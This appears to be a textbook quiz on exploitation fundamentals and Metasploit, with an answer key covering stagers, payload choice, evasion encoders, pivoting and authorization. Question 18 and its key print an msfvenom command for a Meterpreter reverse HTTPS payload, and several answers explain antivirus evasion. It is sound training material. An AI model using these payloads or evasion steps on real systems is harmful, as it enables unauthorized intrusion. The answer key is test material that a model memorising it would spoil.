Chapter 12: Quiz — Exploitation Fundamentals and Metasploit

Test your understanding of exploitation concepts and the Metasploit Framework. Select the best answer for each question.

Question 1. What is the primary difference between a "stager" and a "stage" in Metasploit's payload architecture?

A) A stager runs on the attacker's machine; a stage runs on the target B) A stager is a small payload that downloads the larger stage to the target C) A stage executes first to prepare the environment for the stager D) Stagers are encrypted; stages are not

Question 2. Which Metasploit exploit ranking indicates that the exploit will never crash the target service?

A) GreatRanking B) GoodRanking C) ExcellentRanking D) NormalRanking

Question 3. You are testing a system behind a firewall that blocks all inbound connections but allows outbound HTTPS. Which payload type is most appropriate?

A) windows/x64/meterpreter/bind_tcp B) windows/x64/meterpreter/reverse_https C) windows/x64/shell/bind_tcp D) windows/x64/meterpreter/reverse_tcp

Question 4. What is the purpose of the check command in Metasploit?

A) To verify your Metasploit installation is up to date B) To test whether the target is likely vulnerable without exploiting it C) To check if your payload can evade antivirus D) To verify database connectivity

Question 5. Which Meterpreter feature makes it particularly difficult for traditional antivirus to detect?

A) It uses strong encryption for all communications B) It runs entirely in memory without writing files to disk C) It mimics legitimate Windows services D) It uses polymorphic encoding to change its signature

Question 6. What does the getsystem command in Meterpreter attempt to do?

A) Display detailed system information B) Restart the target system C) Escalate privileges to NT AUTHORITY\SYSTEM D) Create a persistent backdoor

Question 7. In Metasploit, what is the purpose of the multi/handler module?

A) To manage multiple exploits simultaneously B) To listen for incoming connections from reverse payloads C) To handle multi-threaded scanning operations D) To load multiple post-exploitation modules

Question 8. Which of the following is NOT a valid Metasploit module type?

A) Exploit B) Auxiliary C) Rootkit D) Evasion

Question 9. You have obtained a Meterpreter session on a server that has access to an internal network segment (192.168.1.0/24) that your attack machine cannot reach. What Meterpreter feature allows you to scan this network?

A) Port forwarding B) Process migration C) Pivoting via autoroute D) Session backgrounding

Question 10. What is the shikata_ga_nai encoder primarily used for?

A) Compressing payloads to fit in smaller buffers B) Polymorphic XOR encoding to evade signature-based detection C) Encrypting C2 communications D) Encoding payloads for transmission over HTTP

Question 11. What must you ALWAYS obtain before conducting exploitation activities during a penetration test?

A) CVE numbers for all vulnerabilities to be exploited B) Signed Rules of Engagement with explicit authorization C) A zero-day exploit for the target system D) Root access to the target's network infrastructure

Question 12. Which Metasploit command imports results from third-party scanning tools?

A) db_import B) load_scan C) import_results D) scan_import

Question 13. When exploiting a healthcare system like MedSecure, what additional consideration is paramount compared to a standard corporate target?

A) Healthcare systems are typically easier to exploit B) HIPAA requires all penetration tests to be reported to the government C) System crashes could impact patient safety and care D) Healthcare networks never have firewalls

Question 14. What is the purpose of Metasploit workspaces?

A) To provide different user interfaces for different skill levels B) To separate data from different engagements and prevent cross-contamination C) To allow multiple users to run exploits simultaneously D) To manage different versions of the Metasploit Framework

Question 15. You are writing a custom Metasploit module. Which programming language must it be written in?

A) Python B) C C) Ruby D) Perl

Question 16. What exploit mitigation technique randomizes the base addresses of the stack, heap, and libraries in memory?

A) DEP (Data Execution Prevention) B) Stack Canaries C) ASLR (Address Space Layout Randomization) D) CFI (Control Flow Integrity)

Question 17. After successfully exploiting a target during an authorized penetration test, which action should you take FIRST?

A) Immediately attempt to escalate privileges B) Document the timestamp, technique, and evidence of the exploitation C) Install a persistent backdoor for future access D) Begin scanning for additional targets on the network

Question 18. Which msfvenom command would generate a Windows x64 Meterpreter reverse HTTPS payload as an EXE file?

A) msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe B) msfvenom -p windows/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe C) msfvenom -e windows/x64/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe D) msfvenom -p windows/x64/shell/reverse_https LHOST=10.0.0.5 LPORT=443 -f raw -o payload.exe

Answer Key

  1. B — A stager is a small initial payload that establishes a communication channel and downloads the larger stage (e.g., Meterpreter). This two-phase approach allows the exploit to use a small buffer for the stager while delivering full functionality via the stage.

  2. C — ExcellentRanking (600) indicates the exploit will never crash the service. These are typically SQL injection, command injection, or other logic-based exploits that do not risk destabilizing the target.

  3. Breverse_https has the target make an outbound HTTPS connection to the attacker. Since the firewall blocks inbound connections (ruling out bind payloads) but allows outbound HTTPS, this payload will work and blend with legitimate traffic.

  4. B — The check command probes the target to determine if it is vulnerable without actually sending the exploit payload. Not all modules support it, but it should always be tried first, especially in sensitive environments.

  5. B — Meterpreter runs entirely in memory (in-process), never writing files to disk during normal operation. Traditional antivirus relies heavily on file-based scanning, making in-memory payloads harder to detect.

  6. C — The getsystem command attempts multiple privilege escalation techniques (named pipe impersonation, token duplication) to escalate from a lower-privilege user to NT AUTHORITY\SYSTEM—the highest privilege level on Windows.

  7. B — The multi/handler module is a generic listener that catches incoming connections from reverse payloads. It can handle various payload types and is essential when delivering payloads outside the normal exploit workflow.

  8. C — Rootkit is not a Metasploit module type. The valid module types are: Exploit, Auxiliary, Post, Payload, Encoder, Nop, and Evasion.

  9. C — Pivoting via autoroute (or manual route add) directs Metasploit traffic through the compromised session to reach otherwise inaccessible network segments. Port forwarding handles individual ports, not entire network scans.

  10. B — Shikata_ga_nai is a polymorphic XOR additive feedback encoder. Each encoded payload is unique, making it difficult for signature-based detection to identify. However, it does not defeat behavioral detection.

  11. B — Signed Rules of Engagement (RoE) documenting explicit written authorization is the absolute prerequisite for any exploitation activity. Operating without proper authorization constitutes a criminal offense.

  12. A — The db_import command imports results from various scanning tools including Nmap XML, Nessus, and OpenVAS into the Metasploit database.

  13. C — In healthcare environments, system crashes can directly impact patient safety. A crashed patient monitoring system or medication dispensing system could have life-threatening consequences, making stability paramount.

  14. B — Workspaces isolate data from different engagements. Each workspace maintains separate host, service, credential, and loot databases, preventing accidental data leakage between clients or projects.

  15. C — Metasploit modules are written in Ruby. The framework was rewritten in Ruby for version 3.0, and all modules use Ruby with the Metasploit module API.

  16. C — ASLR randomizes the memory layout of processes, making it difficult for exploits to predict where code and data reside. DEP prevents code execution in data areas, stack canaries detect buffer overflows, and CFI restricts control flow.

  17. B — Documentation should be the first action after any significant event during a penetration test. Timestamps, techniques, and evidence must be recorded while fresh. Further exploitation can proceed after documentation.

  18. A — The correct syntax specifies the full x64 payload path, uses -p for payload, includes LHOST and LPORT options, and uses -f exe for the output format with -o for the output file.